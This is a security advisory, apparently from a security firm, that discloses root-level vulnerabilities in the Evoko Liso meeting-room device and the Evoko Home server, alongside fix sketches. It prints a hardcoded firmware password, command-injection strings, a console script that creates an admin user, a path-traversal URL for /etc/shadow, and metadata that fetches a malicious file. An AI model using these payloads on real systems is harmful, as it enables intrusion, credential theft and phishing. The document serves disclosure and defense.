Update (20190213): Since the beginning of last year, TrueSec has worked closely together with the development team to improve security in both Evoko Liso and Evoko Home. All the vulnerabilities described in this post, with the exception of booting from USB, have been fixed and are no longer applicable.

With the introduction of the 2.x versions of the Liso and Home software, the overall level of security has improved in all parts of the system. If you are an Evoko Liso user, make sure to update to the latest software version.

The original post is left as-is below, with just minor update notes.

This is a full disclosure of several security vulnerabilities in Evoko Liso and Evoko Home. The vulnerabilities were found during a small security test ordered by our customer. Since the vulnerabilities affect other Evoko users, we decided (with permission from our customer) to share the details with Evoko. The vulnerability details were provided to Evoko on January 27th 2017, with a 90-day responsible disclosure period.

TL;DR

We’ve found multiple vulnerabilities that can be exploited to execute code with root privileges on the Evoko Liso system. In addition, we were able to gain complete root access remotely, through an unauthenticated arbitrary file write, on a Linux server running the Evoko Home server software.

Timeline

- 2017-01-09 – 2017-01-11: Tests performed

- 2017-01-13: Initial contact with Evoko, notifying them about our tests

- 2017-01-26: Phone meeting with Evoko, describing our findings in more detail

- 2017-01-27: Full vulnerability report sent to Evoko

- 2017-04-27: Full disclosure

About the Evoko products tested

Evoko Liso is a touch-screen device for managing meeting room bookings. Read more about Evoko Liso on their website. We used the firmware version v1.24, which was released in December 2016.

Evoko Home is server software used to connect to the booking system (Exchange, O365, GSuite etc.) and for configuration and update management of devices. We used Evoko Home version 1.24 for our tests, which was released in December 2016.

Scope and limitations

These tests were performed over three days by Philip Åkesson and Emil Kvarnhammar. The tests focused on the Evoko Liso device and the Evoko Home server. Due to limited time, no tests were performed related to Bluetooth, NFC, Ethernet/Wi-Fi dongles (as well as other devices in host and device mode) or opening the Evoko Liso case for access to debug ports, memory et cetera.

Current status

We don’t know the exact status of the security vulnerabilities mentioned in this disclosure, since we no longer have access to the Evoko Liso devices. We know (at the time of writing) that Evoko released new firmware four times since we shared the details with them in January. The latest v1.30 was released today. We kindly refer to their support channels for further information about the contents of these updates.

Here is a statement that we received today from Evoko:

As responsible for the development of the product we welcome suggestions on how we can improve the product. Security is very important to us and we take action to resolve reported vulnerabilities without unnecessary delay and do our best to proactively stay ahead of future threats. The test report from TrueSec is taken very seriously and most of the reported issues have been resolved in more recent releases. We are still implementing some changes that will remove the need of the “desktop” all together and move the diagnostic tool directly into our application, but in the mean time we have taken several steps to secure this part of the system until it can be removed.

If you have any additional questions or suggestions please contact me directly at: anders.karlsson@certus.com.hk

Best regards,

Anders Karlsson

R&D Manager

Some thoughts on IoT security

We see a lack of security in the design of several IoT products today. The Evoko Liso device is a typical example of embedded equipment that will be connected to a corporate network. These devices contain a full Linux system, but corporate IT admins have very little control over them (due to their encapsulated design and limited interfaces). This leaves most of the security decisions to the device vendors – for application code, operating system and third party libraries. It is crucial that IoT vendors build secure and robust systems, and that the systems can be updated remotely in a secure fashion when new vulnerabilities are discovered.

List of vulnerabilities

Evoko Liso will boot from USB and execute arbitrary commands as root

An attacker can boot a customized Linux system from a USB drive, and execute arbitrary shell commands with root privileges in the booted system. There is no protection against reading or modifying the existing file system of the device, which means that an attacker can steal configuration data and install any executable code on the system.

The attacker will only need temporary access (1-5 minutes) to install a permanent backdoor on the system that will remain even after a normal firmware update. The only way to erase such backdoors would be to run a full firmware factory reset over USB. Such attacks can happen before or after the device has been installed outside a conference room.







This vulnerability can also be utilized to extract and/or modify sensitive data like account passwords, Evoko Liso JavaScript code, plain-text WiFi passwords etc. stored on the device. We used the vulnerability to create a reverse shell on the device, and disable the modprobe blacklist (intended to prevent attackers from connecting some devices such as keyboard or mouse).

Insufficient protection of the firmware upgrade process



The firmware images for Evoko Liso are encrypted using GPG in a symmetric encryption mode (CAST5, which is the default in GPG). The encryption key is derived from a static password hardcoded in the firmware.

This password can easily be extracted by an attacker, by downloading and extracting the “usbliso” firmware reset package and then disassembling the “/usr/bin/flashliso” binary, which derives the password and calls an external GPG tool. An even simpler way to extract the password is to replace or wrap the GPG tool with something that prints or logs all parameters, since the password is sent as a command line parameter, and then execute flashliso.

The attack can be used offline to decrypt firmware images as well as to repackage modified images that will be accepted by the device. The password is: l333i76s23O43i12.

The firmware upgrade functionality lacks integrity and authenticity checks of firmware images. This means that an attacker can create a custom firmware image appended with malicious code, and flash that image to the device.
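To illustrate the kind of check that is missing, here is a minimal sketch of signature verification before flashing, using Node's built-in `crypto` module with an Ed25519 key pair. This is not Evoko's implementation: the key pair, the function names `signFirmware` and `isFirmwareAuthentic`, and the placeholder image bytes are all assumptions made for the example. On a real device only the public key would be stored.

```javascript
const crypto = require("crypto");

// Hypothetical vendor key pair, generated here only so the sketch is
// self-contained. The private key would never leave the vendor's build system.
const { publicKey, privateKey } = crypto.generateKeyPairSync("ed25519");

// Vendor side: sign the raw firmware bytes.
// For Ed25519 keys the algorithm argument must be null.
function signFirmware(image, key) {
  return crypto.sign(null, image, key);
}

// Device side: only flash when the signature matches the image.
function isFirmwareAuthentic(image, signature, key) {
  return crypto.verify(null, image, key, signature);
}

const image = Buffer.from("firmware image bytes (placeholder)");
const signature = signFirmware(image, privateKey);

// An image with extra code appended no longer matches the signature.
const tampered = Buffer.concat([image, Buffer.from("appended payload")]);

console.log(isFirmwareAuthentic(image, signature, publicKey));    // true
console.log(isFirmwareAuthentic(tampered, signature, publicKey)); // false
```

Unlike a shared symmetric password, extracting the public key from the device does not help an attacker produce images that pass this check.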

There is also an option to reset the firmware by booting via USB. The code that decrypts and flashes the firmware in this scenario is loaded from the USB drive. This means that the firmware doesn’t even have to be encrypted. An attacker can easily flash a plain-text firmware image instead.

Note that the Evoko Liso System Admin Guide documentation claims that the device has a “Secured and fused bootloader to prevent unauthorized firmware installation”. Still, it is easy for us to install unauthorized firmware. Authentication is not required since firmware images can be modified at rest or in transit without access to the device.

Insecure Kiosk mode in the Evoko application

There are several ways to break out of the kiosk mode in Evoko Liso.

Before the Evoko Liso has been configured, an attacker can exit the Evoko application at any time by using keyboard shortcuts such as Alt+Tab or Ctrl+Shift+W. This brings the attacker to the Desktop view. From the Desktop view, the attacker can launch a full browser using the Diagnostics tool icon. This is actually a simple web page opened in the Chrome browser, running as root. From here we can browse to file:///. The attacker can browse and read the entire file system (account passwords, plain-text WiFi passwords, Evoko Liso source code, credentials etc.) with root privileges.

After the Evoko Liso has been configured, it’s still possible to access the Desktop view (and reach the Diagnostics tool icon) by supplying the admin PIN.



In addition to this, we were able to reach the Desktop view by rebooting the device several times, eventually ending up in a state where the Evoko application either does not start at all or takes a long time (more than a few minutes) to start, which bypasses the admin PIN requirement.

If you continue reading, you’ll see what more you can do while having access to the Chrome browser.



Execute arbitrary shell command with root privileges from JavaScript

An attacker can execute an arbitrary shell command with root privileges by loading specially crafted JavaScript into the Chrome browser on Evoko Liso. Note that the root access is not related to the fact that the Chrome browser is running as the root user. A background service listening on a local socket runs as root and receives web socket calls from the Diagnostics tool web page.

The JavaScript to trigger this can be loaded in several ways, for instance by opening the Chrome Developer Console (Ctrl+Shift+I), or even directly from the address bar.

Example:

Simply typing “javascript:diagnosticExec(null,'reboot');” in the Chrome address bar, with the Diagnostics page loaded, will execute the command “reboot” as root.

There are several other JavaScript functions in the implementation that allow similar command injection. There is no input filtering in the background service receiving the command.
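One common way to close this class of hole is for the privileged service to accept only named actions from a fixed allowlist, instead of a free-form command string. The sketch below shows the idea. The action names, the commands they map to, and the function `resolveDiagnosticAction` are hypothetical and are not taken from the Evoko code.

```javascript
// Hypothetical allowlist: each action name maps to a fixed argument vector.
// Nothing supplied by the web page ever becomes part of the command itself.
const ALLOWED_ACTIONS = new Map([
  ["show-ip", ["ip", "addr", "show"]],
  ["ping-gateway", ["ping", "-c", "1", "192.0.2.1"]],
]);

// Returns the argv for a known action and throws for anything else.
function resolveDiagnosticAction(action) {
  if (typeof action !== "string" || !ALLOWED_ACTIONS.has(action)) {
    throw new Error("unknown diagnostic action");
  }
  // Return a copy so callers cannot modify the allowlist entries.
  return ALLOWED_ACTIONS.get(action).slice();
}

console.log(resolveDiagnosticAction("show-ip")); // [ 'ip', 'addr', 'show' ]

try {
  resolveDiagnosticAction("reboot");
} catch (err) {
  console.log(err.message); // unknown diagnostic action
}
```

With this shape, a call such as diagnosticExec(null,'reboot') would be rejected unless "reboot" had deliberately been added to the list.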

Execute arbitrary shell command with root privileges from Wi-Fi Connect menu

An attacker can execute an arbitrary shell command with root privileges, by navigating to the Wi-Fi connect menu and attempting to connect to a Wi-Fi hotspot with a specially crafted SSID created by the attacker, for example containing the string “`reboot`”.

A similar attack can be performed by supplying a similarly crafted password value when connecting to a legitimate Wi-Fi network in the list.

If performed during the initial setup process, this attack could potentially be carried out without any local access at all from the attacker’s point-of-view.
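Injection through an SSID containing backticks suggests that the value ends up inside a shell command string. We did not see the device-side code for this path, so the following is only a sketch of the usual remedy: pass untrusted values as discrete arguments with `child_process.execFile`, which does not start a shell. The helper path `/usr/bin/wifi-connect` and its `--ssid` flag are hypothetical.

```javascript
const { execFile } = require("child_process");

// Hypothetical helper binary; the tool actually used on the device is unknown.
const WIFI_HELPER = "/usr/bin/wifi-connect";

// Build an argument vector. The SSID is one array element, so backticks,
// semicolons and $(...) are passed through as literal characters.
function buildConnectArgs(ssid) {
  if (typeof ssid !== "string" || ssid.length === 0) {
    throw new TypeError("ssid must be a non-empty string");
  }
  return ["--ssid", ssid];
}

// execFile runs the binary directly, without a shell, so nothing in the
// arguments is interpreted as shell syntax. Not invoked in this sketch.
function connect(ssid, callback) {
  execFile(WIFI_HELPER, buildConnectArgs(ssid), callback);
}

console.log(buildConnectArgs("`reboot`")); // [ '--ssid', '`reboot`' ]
```

The Wi-Fi password needs the same treatment. Sending it over stdin rather than as an argument would also keep it out of the process list.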

Evoko Home: Create user account with admin rights

An attacker with network connection to the Evoko Home application can use built-in functionality to create a new user account with administrator rights. No user authentication is required to perform this operation.

One way to exploit this is to navigate to the Evoko Home login page and use the developer tools that are available in most browsers to execute JavaScript. In Firefox, press Ctrl+Shift+K to open the Web Console and enter the following script:

Package["accounts-base"].Accounts.createUser({username:"test@test.com", email:"test@test.com", password:"test", profile: {name:"Test", pin:"1234", rfid:"", type:"Admin"}},function(e){alert(e)});

to create a new admin user called “Test”.

An attacker could for instance utilize the administrator access to load custom firmware images into Evoko Home, that will be treated as upgrades by the connected Evoko Liso devices.

The administrator access can also be used to enumerate user accounts, including admin PIN codes. The admin privileges can also be used to set the firmware download URL (see “Arbitrary file write with root privileges”).

It is worth noting that the Evoko Liso devices have the network access required to perform this attack on Evoko Home (when used in Server mode). This means that an attacker who can execute code on Evoko Liso could also become administrator on the Evoko Home server.
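The underlying problem is that the server trusts a client-supplied profile, including "type":"Admin", from a caller who is not logged in. Below is a minimal, framework-independent sketch of the server-side check that would prevent this. The function name `authorizeCreateUser` and the shape of the `caller` object are assumptions for the example. Only the `profile.type` field comes from the script above.

```javascript
// Server-side sketch: the caller's identity comes from the server's own
// session state (hypothetical `caller` object), never from the request body.
function authorizeCreateUser(caller, options) {
  const callerIsAdmin = Boolean(
    caller && caller.profile && caller.profile.type === "Admin"
  );
  if (!callerIsAdmin) {
    throw new Error("not authorized to create users");
  }
  // Return a copy so later validation works on data the client cannot mutate.
  return { ...options, profile: { ...options.profile } };
}

const request = {
  username: "test@test.com",
  profile: { name: "Test", type: "Admin" },
};

try {
  authorizeCreateUser(null, request); // unauthenticated caller
} catch (err) {
  console.log(err.message); // not authorized to create users
}

const admin = { profile: { type: "Admin" } };
console.log(authorizeCreateUser(admin, request).profile.type); // Admin
```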

Evoko Home: Send email with arbitrary content and recipient

An attacker with network access to the Evoko Home application can use built-in functionality to send an email with content and recipients specified by the attacker. This functionality could be used to send phishing emails, for example. Because the emails originate from the organization’s own Evoko Home server, they are unlikely to be caught by email filters and are likely to be treated as legitimate by receiving users.

This can be exploited by navigating to Evoko Home and running the following JavaScript from the developer tools:

Meteor.call("sendCheckInReminderEmail",{message:'Not phishing!',organizer:'recipient@test.com',subject:'subject'});

Another way to send emails is to craft a DDP call to “sendCheckInReminderEmail”, with the appropriate parameters.

Evoko Home: Server certificate upload – Denial of Service

The server certificate upload functionality allows unauthenticated access, which can be used as denial of service when a malformed or bogus certificate is uploaded.

Example using curl:

curl -k -F "uploadType=CredentialServerCrt" -F "file=@/home/user/bogus.file" https://localhost:3002/upload

Evoko Home: Read arbitrary file on file system with root privileges

An attacker with network access to the Evoko Home server can utilize a path traversal vulnerability in the Upload module to read arbitrary files on the server running Evoko Home. The default configuration starts Evoko Home as root, which means that all files on the server can be accessed.

The actual vulnerable code is in the tomi-upload-server module for Meteor. Check out the code here:

https://github.com/tomitrescak/meteor-tomi-upload-server

The file name provided in the URI is not filtered, which means that the client has full control over which file is read.

Example usage:

https://evoko_home_ip:3002/upload/..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
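For comparison, here is a minimal sketch of the containment check that defeats this request: decode the name, resolve it against the upload directory, and reject anything that lands outside it. This is not the module's actual code. The directory `/var/lib/evoko-home/uploads` and the function `resolveUploadPath` are hypothetical.

```javascript
const path = require("path");

// Hypothetical upload directory; the real location may differ.
const UPLOAD_DIR = "/var/lib/evoko-home/uploads";

// Decode the URI component, resolve it against the upload directory and
// make sure the result is still inside that directory.
function resolveUploadPath(encodedName) {
  const name = decodeURIComponent(encodedName);
  const resolved = path.posix.resolve(UPLOAD_DIR, name);
  if (!resolved.startsWith(UPLOAD_DIR + "/")) {
    throw new Error("path escapes upload directory");
  }
  return resolved;
}

console.log(resolveUploadPath("report.txt"));
// /var/lib/evoko-home/uploads/report.txt

try {
  resolveUploadPath("..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow");
} catch (err) {
  console.log(err.message); // path escapes upload directory
}
```

Running the server as an unprivileged user would further limit what a traversal bug can reach, but it does not replace the check.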

Insecure remote procedure call protocol

The DDP remote procedure call protocol used between Evoko Liso and Evoko Home allows unauthenticated connections. This can be used to retrieve information about all users, settings and logs. It is also possible, for example, to send emails and trigger firmware updates through this interface.
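In Meteor, a method handler can inspect `this.userId`, which is null when the DDP connection has not logged in. The sketch below wraps a handler so that it refuses such calls. The wrapper `requireLogin` and the placeholder method body are assumptions for the example, and devices such as Evoko Liso would need their own credentials for a scheme like this to work.

```javascript
// Wrap a method handler so that it only runs for logged-in connections.
// Meteor invokes method handlers with `this.userId` set to the user's id,
// or null for an unauthenticated connection.
function requireLogin(handler) {
  return function (...args) {
    if (!this || !this.userId) {
      throw new Error("not-authorized");
    }
    return handler.apply(this, args);
  };
}

// Placeholder method table standing in for what would be registered
// with Meteor.methods(...).
const methods = {
  sendCheckInReminderEmail: requireLogin(function (params) {
    // Placeholder body: a real handler would send the email here.
    return "queued for " + params.organizer;
  }),
};

try {
  methods.sendCheckInReminderEmail.call({ userId: null }, { organizer: "recipient@test.com" });
} catch (err) {
  console.log(err.message); // not-authorized
}

console.log(
  methods.sendCheckInReminderEmail.call({ userId: "u1" }, { organizer: "recipient@test.com" })
); // queued for recipient@test.com
```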

MiTM attack on firmware download

Firmware metadata is by default downloaded from the Evoko release server over plain-text HTTP, without origin verification or integrity checks. A man-in-the-middle could modify the fetched metadata, which includes the link to the firmware image.

The default URL used is “http://31.192.228.56:80”.

Arbitrary file write with root privileges

We discovered an arbitrary file write vulnerability in both Evoko Home and connected Liso devices. It can be achieved by modifying the firmware metadata and file contents returned by the download server. For example, serving the metadata

“{"fileName":"../../arbitrary.write","version":"2016_12_19_v1.24","downloadLink":"http://host:8000/malicious_file"}” at the path “/firmware/check/version/latest”

will overwrite the local file specified by ‘fileName’ with the contents in the remote file at the URL specified by ‘downloadLink’.
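A minimal sketch of the validation that is missing here: treat the metadata as untrusted, accept only a plain file name with no directory components, and refuse download links that are not HTTPS. The function `validateFirmwareMetadata` and the example host `updates.example.com` are hypothetical. HTTPS on its own does not prove that an image is genuine, so this complements an integrity check rather than replacing one.

```javascript
const path = require("path");

// Validate untrusted firmware metadata before using any of its fields.
function validateFirmwareMetadata(meta) {
  const { fileName, downloadLink } = meta;

  // A safe file name is a single path component: no "/", no "\", no "..".
  const isPlainName =
    typeof fileName === "string" &&
    fileName !== "" &&
    fileName !== "." &&
    fileName !== ".." &&
    !fileName.includes("\\") &&
    path.posix.basename(fileName) === fileName;
  if (!isPlainName) {
    throw new Error("unsafe fileName");
  }

  // new URL() throws on malformed input; plain-text HTTP is rejected.
  const url = new URL(downloadLink);
  if (url.protocol !== "https:") {
    throw new Error("downloadLink must use https");
  }

  return { fileName, downloadLink: url.href };
}

try {
  validateFirmwareMetadata({
    fileName: "../../arbitrary.write",
    version: "2016_12_19_v1.24",
    downloadLink: "http://host:8000/malicious_file",
  });
} catch (err) {
  console.log(err.message); // unsafe fileName
}
```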

There are two ways to modify the metadata sent by the download server: an attacker could change the firmware download URL in global settings to a URL controlled by the attacker, or perform a man-in-the-middle attack on traffic towards the default URL.

Since we are allowed to write to an arbitrary location in the file system with root privileges, we also have a way to execute code as root. We could utilize this to gain complete access to a server running Evoko Home, or to an Evoko Liso device.

You might ask: So why is the file downloaded and written as root? Simply because all the Evoko software runs as root, both in Evoko Liso and Evoko Home. It would of course still be a security issue, even if it used an account with limited privileges.